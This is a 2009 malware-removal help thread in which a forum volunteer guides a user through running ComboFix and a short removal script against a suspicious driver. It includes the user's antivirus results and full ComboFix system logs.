    F-Secure Anti-Virus
    Found nothing
    Ikarus
    Found nothing
    Kaspersky Anti-Virus
    Found nothing
    NOD32
    Found nothing
    Norman Virus Control
    Found nothing
    Panda Antivirus
    Found nothing
    Quick Heal
    Found Backdoor.IEbooot.bne
    Sophos Antivirus
    Found nothing
    VirusBuster
    Found nothing
    VBA32
    Found nothing
     
  11. 2009/04/12
    Geri Lifetime Subscription

    Geri Inactive Alumni

    Hi
    Ok please do this.

    Download ComboFix from Here to your Desktop.

    It's best to disable realtime protection applications as they sometimes interfere with the tool.
    Check this link for any applicable programs you may have.
    • Close all open programs and windows
    • Double click combofix.exe and follow the prompts.
    • Vista users right click Combofix.exe and select Run As Administrator.
    • When finished, it shall produce a log for you. Post the Combofix log
    Note: Do not mouse-click ComboFix's window while it's running. That may cause it to stall.

    **NOTE - Allow ComboFix to update if prompted.

    Geri
     
  12. 2009/04/12
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Hello Geri
    Thanks a lot for your reply.

    You know, last time when I had some hard disk issues, I installed the ComboFix, and later a TROJAN or WORM with the name of RMTADMN was identified in ComboFix, and RMTADMN stands for REMOTE ADMIN.

    Are you sure that COMBO FIX is safe?
     
  13. 2009/04/12
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Okay, it's safe, I just read an article.

    I'm downloading it and then will post the details.
     
  14. 2009/04/12
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Geri, I just found that the combofix.exe has something like this:

    Trojan RemAdm-Proclaunch!171

    What to do? Should I continue?
     
  15. 2009/04/12
    Geri Lifetime Subscription

    Geri Inactive Alumni

    Hi
    Yes please continue
     
  16. 2009/04/12
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    ComboFix 09-04-12.03 - Zeeshan Hashmi 2009-04-12 21:05.1 - FAT32x86
    Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1013.465 [GMT 5:00]
    Running from: c:\documents and settings\Zeeshan Hashmi\Desktop\BBS\ComboFix.exe
    AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
    AV: McAfee VirusScan *On-access scanning enabled* (Updated)
    FW: McAfee Personal Firewall *enabled*
    * Created a new restore point

    WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
    .

    ((((((((((((((((((((((((( Files Created from 2009-03-12 to 2009-04-12 )))))))))))))))))))))))))))))))
    .

    2009-04-09 15:25 . 2009-04-09 15:25 -------- d--h--w c:\windows\PIF
    2009-04-09 07:34 . 2009-04-09 07:34 -------- d--h--w C:\$AVG8.VAULT$
    2009-04-09 04:17 . 2009-04-09 04:17 108552 ----a-w c:\windows\system32\drivers\avgtdix.sys
    2009-04-09 04:17 . 2009-04-09 04:17 10520 ----a-w c:\windows\system32\avgrsstx.dll
    2009-04-09 04:17 . 2009-04-09 04:17 325640 ----a-w c:\windows\system32\drivers\avgldx86.sys
    2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\windows\system32\drivers\Avg
    2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\avg8
    2009-04-09 03:23 . 2009-04-09 03:23 141312 ----a-w c:\windows\system32\drivers\sp_rsdrv2.sys
    2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Spyware Terminator
    2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\Spyware Terminator
    2009-04-08 08:12 . 2009-04-08 08:12 136256 ----a-w c:\windows\system32\drivers\ethjnevj.sys
    2009-04-07 14:34 . 2009-04-07 14:34 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\MSNInstaller
    2009-04-04 02:29 . 2009-04-04 02:29 192840 ----a-w c:\windows\dua.jpg
    2009-03-21 03:03 . 2009-03-21 03:03 -------- d-----w c:\windows\system32\config\systemprofile\Application Data\SACore
    2009-03-21 03:00 . 2009-03-21 03:00 -------- d-sh--w C:\FOUND.043
    2009-03-16 15:06 . 2009-03-16 15:06 -------- d-----w c:\documents and settings\anis

    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\program files\AVG
    2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\program files\Spyware Terminator
    2009-03-18 04:37 . 2009-03-18 04:37 -------- d-----w c:\program files\Microsoft Silverlight
    2009-03-10 14:49 . 2009-03-10 14:49 23006 ----a-w C:\ASLog.txt
    2009-02-20 04:57 . 2009-02-20 04:57 410984 ----a-w c:\windows\system32\deploytk.dll
    2009-02-18 08:36 . 2009-02-18 08:36 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Media Player Classic
    2009-02-06 13:52 . 2009-02-06 13:52 49504 ----a-w c:\windows\system32\sirenacm.dll
    2009-02-05 06:25 . 2009-02-05 06:25 44544 ------w c:\windows\AWuninstall.exe
    2009-01-19 08:16 . 2009-01-10 20:54 206 ----a-w C:\realtek.log
    2009-01-19 08:16 . 2007-07-03 08:55 467 ----a-w C:\RHDSetup.log
    .

    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Skype "= "c:\program files\Skype\Phone\Skype.exe" [2008-11-07 21633320]
    "Google Update "= "c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" [2009-01-14 133104]
    "MSMSGS "= "c:\program files\Messenger\msmsgs.exe" [2004-08-04 1667584]
    "H/PC Connection Agent "= "c:\program files\Microsoft ActiveSync\Wcescomm.exe" [2006-11-13 1289000]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "iKeyWorks "= "c:\progra~1\A4Tech\Keyboard\Ikeymain.exe" [2006-09-07 65536]
    "IgfxTray "= "c:\windows\system32\igfxtray.exe" [2007-03-13 98304]
    "HotKeysCmds "= "c:\windows\system32\hkcmd.exe" [2007-03-13 114688]
    "Persistence "= "c:\windows\system32\igfxpers.exe" [2007-03-13 94208]
    "Acrobat Assistant 8.0 "= "d:\program files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe" [2006-10-22 620152]
    "mcagent_exe "= "c:\program files\McAfee.com\Agent\mcagent.exe" [2009-01-08 645328]
    "SunJavaUpdateSched "= "c:\program files\Java\jre6\bin\jusched.exe" [2009-02-20 148888]
    "AVG8_TRAY "= "c:\progra~1\AVG\AVG8\avgtray.exe" [2009-04-09 1932568]
    "RTHDCPL "= "RTHDCPL.EXE" [2007-03-13 c:\windows\RTHDCPL.exe]
    "SkyTel "= "SkyTel.EXE" [2007-03-13 c:\windows\SkyTel.exe]

    c:\documents and settings\All Users.WINDOWS\Start Menu\Programs\Startup\
    Adobe Acrobat Speed Launcher.lnk - c:\windows\Installer\{AC76BA86-1033-0000-7760-000000000003}\_SC_Acrobat.exe [2009-01-11 295606]
    Adobe Acrobat Synchronizer.lnk - d:\program files\Adobe\Acrobat 8.0\Acrobat\AdobeCollabSync.exe [2006-10-23 734872]
    Microsoft Office OneNote 2003 Quick Launch.lnk - d:\program files\Microsoft Office\OFFICE11\ONENOTEM.EXE [2003-08-06 51776]
    Monitor Apache Servers.lnk - d:\program files\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe [2008-12-10 41042]

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
    2009-04-09 09:17 10520 c:\windows\system32\avgrsstx.dll

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "vidc.ffds "= ffdshow.ax
    "msacm.ac3filter "= ac3filter.acm

    [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
    SecurityProviders msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

    [HKEY_LOCAL_MACHINE\software\microsoft\security center]
    "AntiVirusDisableNotify "=dword:00000001

    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
    "DisableMonitoring "=dword:00000001

    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
    "DisableMonitoring "=dword:00000001

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
    "EnableFirewall "= 0 (0x0)

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
    "%windir%\\system32\\sessmgr.exe "=
    "c:\\Program Files\\Bonjour\\mDNSResponder.exe "=
    "c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe "=
    "c:\\Program Files\\NuSphere\\PhpED\\Srv.exe "=
    "c:\\Program Files\\NuSphere\\PhpED\\debugger\\DbgListener.exe "=
    "c:\\Program Files\\NuSphere\\PhpED\\phped.exe "=
    "c:\program files\Microsoft ActiveSync\rapimgr.exe "= c:\program files\Microsoft ActiveSync\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager
    "c:\program files\Microsoft ActiveSync\wcescomm.exe "= c:\program files\Microsoft ActiveSync\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager
    "c:\program files\Microsoft ActiveSync\WCESMgr.exe "= c:\program files\Microsoft ActiveSync\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application
    "c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe "=
    "c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe "=
    "c:\\Program Files\\AVG\\AVG8\\avgupd.exe "=
    "c:\\Program Files\\AVG\\AVG8\\avgnsx.exe "=
    "c:\\Program Files\\Skype\\Phone\\Skype.exe "=

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
    "26675:TCP "= 26675:TCP:169.254.2.0/255.255.255.0:Enabled:ActiveSync Service

    R1 ethjnevj;ethjnevj;c:\windows\system32\drivers\ethjnevj.sys [2009-04-08 136256]
    S1 AvgLdx86;AVG Free AVI Loader Driver x86;c:\windows\System32\Drivers\avgldx86.sys [2009-04-09 325640]
    S1 AvgTdiX;AVG Free8 Network Redirector;c:\windows\System32\Drivers\avgtdix.sys [2009-04-09 108552]
    S2 Apache2.2;Apache2.2;d:\program files\Apache Software Foundation\Apache2.2\bin\httpd.exe [2008-12-10 24636]
    S2 avg8wd;AVG Free8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [2009-04-09 298264]
    S2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-02-11 210216]


    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{25b5fcdc-dfaf-11dd-9a80-0019d19d4b36}]
    \Shell\AutoRun\command - I:\LaunchU3.exe
    .
    Contents of the 'Scheduled Tasks' folder

    2009-01-11 c:\windows\Tasks\McQcTask.job
    - c:\program files\mcafee\mqc\QcConsol.exe [2009-01-09 10:53]

    2009-03-14 c:\windows\Tasks\McDefragTask.job
    - c:\windows\system32\defrag.exe [2004-08-03 22:56]

    2009-04-12 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1390067357-1123561945-725345543-1003.job
    - c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2009-01-14 09:15]
    .
    - - - - ORPHANS REMOVED - - - -

    HKLM-Run-<NO NAME> - (no file)


    .
    ------- Supplementary Scan -------
    .
    uStart Page = about:blank
    uInternet Settings,ProxyOverride = *.local
    IE: Append to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert link target to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: Convert link target to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert selected links to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    IE: Convert selected links to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    IE: Convert selection to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: Convert selection to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: E&xport to Microsoft Excel - d:\progra~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
    IE: NuSphere PhpED :: Debug this page - c:\program files\NuSphere\PhpED\NuSphereIEBar.dll/1000
    FF - ProfilePath - c:\documents and settings\Zeeshan Hashmi\Application Data\Mozilla\Firefox\Profiles\dtdedgo9.default\
    FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
    FF - prefs.js: browser.search.selectedEngine - Google
    FF - prefs.js: browser.startup.homepage -
    FF - component: c:\program files\AVG\AVG8\Firefox\components\avgssff.dll
    FF - component: c:\program files\McAfee\SiteAdvisor\components\McFFPlg.dll
    FF - component: c:\program files\Mozilla Firefox\extensions\{B13721C7-F507-4982-B2E5-502A71474FED}\components\NPComponent.dll
    FF - plugin: c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\1.2.141.5\npGoogleOneClick7.dll
    FF - plugin: d:\program files\Adobe\Acrobat 8.0\Acrobat\browser\nppdf32.dll
    .

    **************************************************************************

    catchme 0.3.1375 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2009-04-12 21:08
    Windows 5.1.2600 Service Pack 2 FAT NTAPI

    scanning hidden processes ...

    scanning hidden autostart entries ...

    scanning hidden files ...

    scan completed successfully
    hidden files: 0

    **************************************************************************

    [HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MySQL]
    "ImagePath "= "\ "d:\program files\MySQL\MySQL Server 5.1\bin\mysqld\" --defaults-file=\ "d:\program files\MySQL\MySQL Server 5.1\my.ini\" MySQL "
    .
    --------------------- DLLs Loaded Under Running Processes ---------------------

    - - - - - - - > 'explorer.exe'(4520)
    c:\program files\McAfee\SiteAdvisor\saHook.dll
    c:\windows\system32\IKEYRFK8.DLL
    .
    Completion time: 2009-04-12 21:10
    ComboFix-quarantined-files.txt 2009-04-12 16:10
    ComboFix2.txt 2008-12-06 11:49
    ComboFix3.txt 2008-12-03 11:25

    Pre-Run: 8,326,512,640 bytes free
    Post-Run: 9,067,626,496 bytes free

    167 --- E O F --- 2009-01-11 06:39
     
  17. 2009/04/12
    Geri Lifetime Subscription

    Geri Inactive Alumni

    Joined:
    2003/03/02
    Messages:
    4,580
    Likes Received:
    7
    Hi
    Please do this.

    Highlight and copy the contents of the code box below and paste it into a blank Notepad, then save it to your desktop as;

    Filename: CFScript.txt
    Save As Type: All Files (*.*)

    Close all other windows and programs. Now drag the CFScript.txt onto ComboFix.exe and drop it, using the left mouse button.
    Click here to see how to use CFScript.txt
    Combofix should run and may reboot the computer when it's done. A log will open when it's complete. Post the contents of that log.

    Please do not click on the ComboFix window while it is running a scan. This can cause it to stall.

    **NOTE - Allow ComboFix to update if prompted.

    Code:
    http://www.windowsbbs.com/malware-virus-removal/83151-active-strange-issues-must-some-malware.html
    KillAll::
    Collect::
    c:\windows\system32\drivers\ethjnevj.sys
    Driver::
    ethjnevj

    Please post the Combofix log.

    Geri
     
  18. 2009/04/12
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Joined:
    2008/01/13
    Messages:
    77
    Likes Received:
    0
    ComboFix 09-04-12.03 - Zeeshan Hashmi 2009-04-13 9:29.2 - FAT32x86
    Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1013.354 [GMT 5:00]
    Running from: c:\documents and settings\Zeeshan Hashmi\Desktop\BBS\ComboFix.exe
    Command switches used :: c:\documents and settings\Zeeshan Hashmi\Desktop\BBS\CFScript.txt
    AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
    AV: McAfee VirusScan *On-access scanning enabled* (Updated)
    FW: McAfee Personal Firewall *enabled*
    * Created a new restore point

    WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
    .

    ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
    .

    c:\windows\system32\drivers\ethjnevj.sys

    .
    ((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
    .

    -------\Service_ethjnevj


    ((((((((((((((((((((((((( Files Created from 2009-03-13 to 2009-04-13 )))))))))))))))))))))))))))))))
    .

    2009-04-13 04:27 . 2006-03-02 18:42 73728 ----a-w C:\pv.exe
    2009-04-09 15:25 . 2009-04-09 15:25 -------- d--h--w c:\windows\PIF
    2009-04-09 07:34 . 2009-04-09 07:34 -------- d--h--w C:\$AVG8.VAULT$
    2009-04-09 04:17 . 2009-04-09 04:17 108552 ----a-w c:\windows\system32\drivers\avgtdix.sys
    2009-04-09 04:17 . 2009-04-09 04:17 10520 ----a-w c:\windows\system32\avgrsstx.dll
    2009-04-09 04:17 . 2009-04-09 04:17 325640 ----a-w c:\windows\system32\drivers\avgldx86.sys
    2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\windows\system32\drivers\Avg
    2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\avg8
    2009-04-09 03:23 . 2009-04-09 03:23 141312 ----a-w c:\windows\system32\drivers\sp_rsdrv2.sys
    2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Spyware Terminator
    2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\Spyware Terminator
    2009-04-07 14:34 . 2009-04-07 14:34 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\MSNInstaller
    2009-04-04 02:29 . 2009-04-04 02:29 192840 ----a-w c:\windows\dua.jpg
    2009-03-21 03:03 . 2009-03-21 03:03 -------- d-----w c:\windows\system32\config\systemprofile\Application Data\SACore
    2009-03-21 03:00 . 2009-03-21 03:00 -------- d-sh--w C:\FOUND.043
    2009-03-16 15:06 . 2009-03-16 15:06 -------- d-----w c:\documents and settings\anis

    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\program files\AVG
    2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\program files\Spyware Terminator
    2009-03-18 04:37 . 2009-03-18 04:37 -------- d-----w c:\program files\Microsoft Silverlight
    2009-03-10 14:49 . 2009-03-10 14:49 23006 ----a-w C:\ASLog.txt
    2009-02-20 04:57 . 2009-02-20 04:57 410984 ----a-w c:\windows\system32\deploytk.dll
    2009-02-18 08:36 . 2009-02-18 08:36 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Media Player Classic
    2009-02-06 13:52 . 2009-02-06 13:52 49504 ----a-w c:\windows\system32\sirenacm.dll
    2009-02-05 06:25 . 2009-02-05 06:25 44544 ------w c:\windows\AWuninstall.exe
    2009-01-19 08:16 . 2009-01-10 20:54 206 ----a-w C:\realtek.log
    2009-01-19 08:16 . 2007-07-03 08:55 467 ----a-w C:\RHDSetup.log
    .

    ((((((((((((((((((((((((((((( SnapShot@2009-04-12_21.09.02.34 )))))))))))))))))))))))))))))))))))))))))
    .
    + 2009-04-13 04:35 . 2009-04-13 04:35 16384 c:\windows\Temp\Perflib_Perfdata_464.dat
    + 2009-01-10 20:39 . 2009-04-13 03:05 32768 c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
    - 2009-01-10 20:39 . 2009-04-12 12:56 32768 c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
    + 2009-01-10 20:39 . 2009-04-13 03:05 32768 c:\windows\system32\config\systemprofile\Cookies\index.dat
    - 2009-01-10 20:39 . 2009-04-12 12:56 32768 c:\windows\system32\config\systemprofile\Cookies\index.dat
    + 2009-04-13 04:33 . 2005-10-20 15:02 163328 c:\windows\ERDNT\subs\ERDNT.EXE
    .
    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Skype "= "c:\program files\Skype\Phone\Skype.exe" [2008-11-07 21633320]
    "Google Update "= "c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" [2009-01-14 133104]
    "MSMSGS "= "c:\program files\Messenger\msmsgs.exe" [2004-08-04 1667584]
    "H/PC Connection Agent "= "c:\program files\Microsoft ActiveSync\Wcescomm.exe" [2006-11-13 1289000]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "iKeyWorks "= "c:\progra~1\A4Tech\Keyboard\Ikeymain.exe" [2006-09-07 65536]
    "IgfxTray "= "c:\windows\system32\igfxtray.exe" [2007-03-13 98304]
    "HotKeysCmds "= "c:\windows\system32\hkcmd.exe" [2007-03-13 114688]
    "Persistence "= "c:\windows\system32\igfxpers.exe" [2007-03-13 94208]
    "Acrobat Assistant 8.0 "= "d:\program files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe" [2006-10-22 620152]
    "mcagent_exe "= "c:\program files\McAfee.com\Agent\mcagent.exe" [2009-01-08 645328]
    "SunJavaUpdateSched "= "c:\program files\Java\jre6\bin\jusched.exe" [2009-02-20 148888]
    "AVG8_TRAY "= "c:\progra~1\AVG\AVG8\avgtray.exe" [2009-04-09 1932568]
    "RTHDCPL "= "RTHDCPL.EXE" [2007-03-13 c:\windows\RTHDCPL.exe]
    "SkyTel "= "SkyTel.EXE" [2007-03-13 c:\windows\SkyTel.exe]

    c:\documents and settings\All Users.WINDOWS\Start Menu\Programs\Startup\
    Adobe Acrobat Speed Launcher.lnk - c:\windows\Installer\{AC76BA86-1033-0000-7760-000000000003}\_SC_Acrobat.exe [2009-01-11 295606]
    Adobe Acrobat Synchronizer.lnk - d:\program files\Adobe\Acrobat 8.0\Acrobat\AdobeCollabSync.exe [2006-10-23 734872]
    Microsoft Office OneNote 2003 Quick Launch.lnk - d:\program files\Microsoft Office\OFFICE11\ONENOTEM.EXE [2003-08-06 51776]
    Monitor Apache Servers.lnk - d:\program files\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe [2008-12-10 41042]

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
    2009-04-09 09:17 10520 c:\windows\system32\avgrsstx.dll

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "vidc.ffds "= ffdshow.ax
    "msacm.ac3filter "= ac3filter.acm

    [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
    SecurityProviders msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

    [HKEY_LOCAL_MACHINE\software\microsoft\security center]
    "AntiVirusDisableNotify "=dword:00000001

    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
    "DisableMonitoring "=dword:00000001

    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
    "DisableMonitoring "=dword:00000001

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
    "EnableFirewall "= 0 (0x0)

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
    "%windir%\\system32\\sessmgr.exe "=
    "c:\\Program Files\\Bonjour\\mDNSResponder.exe "=
    "c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe "=
    "c:\\Program Files\\NuSphere\\PhpED\\Srv.exe "=
    "c:\\Program Files\\NuSphere\\PhpED\\debugger\\DbgListener.exe "=
    "c:\\Program Files\\NuSphere\\PhpED\\phped.exe "=
    "c:\program files\Microsoft ActiveSync\rapimgr.exe "= c:\program files\Microsoft ActiveSync\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager
    "c:\program files\Microsoft ActiveSync\wcescomm.exe "= c:\program files\Microsoft ActiveSync\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager
    "c:\program files\Microsoft ActiveSync\WCESMgr.exe "= c:\program files\Microsoft ActiveSync\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application
    "c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe "=
    "c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe "=
    "c:\\Program Files\\AVG\\AVG8\\avgupd.exe "=
    "c:\\Program Files\\AVG\\AVG8\\avgnsx.exe "=
    "c:\\Program Files\\Skype\\Phone\\Skype.exe "=

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
    "26675:TCP "= 26675:TCP:169.254.2.0/255.255.255.0:Enabled:ActiveSync Service

    S1 AvgLdx86;AVG Free AVI Loader Driver x86;c:\windows\System32\Drivers\avgldx86.sys [2009-04-09 325640]
    S1 AvgTdiX;AVG Free8 Network Redirector;c:\windows\System32\Drivers\avgtdix.sys [2009-04-09 108552]
    S2 Apache2.2;Apache2.2;d:\program files\Apache Software Foundation\Apache2.2\bin\httpd.exe [2008-12-10 24636]
    S2 avg8wd;AVG Free8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [2009-04-09 298264]
    S2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-02-11 210216]

    .
    Contents of the 'Scheduled Tasks' folder

    2009-01-11 c:\windows\Tasks\McQcTask.job
    - c:\program files\mcafee\mqc\QcConsol.exe [2009-01-09 10:53]

    2009-03-14 c:\windows\Tasks\McDefragTask.job
    - c:\windows\system32\defrag.exe [2004-08-03 22:56]

    2009-04-13 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1390067357-1123561945-725345543-1003.job
    - c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2009-01-14 09:15]
    .
    .
    ------- Supplementary Scan -------
    .
    uStart Page = about:blank
    uInternet Settings,ProxyOverride = *.local
    IE: Append to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert link target to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: Convert link target to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert selected links to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    IE: Convert selected links to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    IE: Convert selection to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: Convert selection to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: E&xport to Microsoft Excel - d:\progra~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
    IE: NuSphere PhpED :: Debug this page - c:\program files\NuSphere\PhpED\NuSphereIEBar.dll/1000
    FF - ProfilePath - c:\documents and settings\Zeeshan Hashmi\Application Data\Mozilla\Firefox\Profiles\dtdedgo9.default\
    FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
    FF - prefs.js: browser.search.selectedEngine - Google
    FF - prefs.js: browser.startup.homepage -
    FF - component: c:\program files\AVG\AVG8\Firefox\components\avgssff.dll
    FF - component: c:\program files\McAfee\SiteAdvisor\components\McFFPlg.dll
    FF - component: c:\program files\Mozilla Firefox\extensions\{B13721C7-F507-4982-B2E5-502A71474FED}\components\NPComponent.dll
    FF - plugin: c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\1.2.141.5\npGoogleOneClick7.dll
    FF - plugin: d:\program files\Adobe\Acrobat 8.0\Acrobat\browser\nppdf32.dll
    .

    **************************************************************************

    catchme 0.3.1375 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2009-04-13 09:38
    Windows 5.1.2600 Service Pack 2 FAT NTAPI

    scanning hidden processes ...

    scanning hidden autostart entries ...

    scanning hidden files ...

    scan completed successfully
    hidden files: 0

    **************************************************************************

    [HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MySQL]
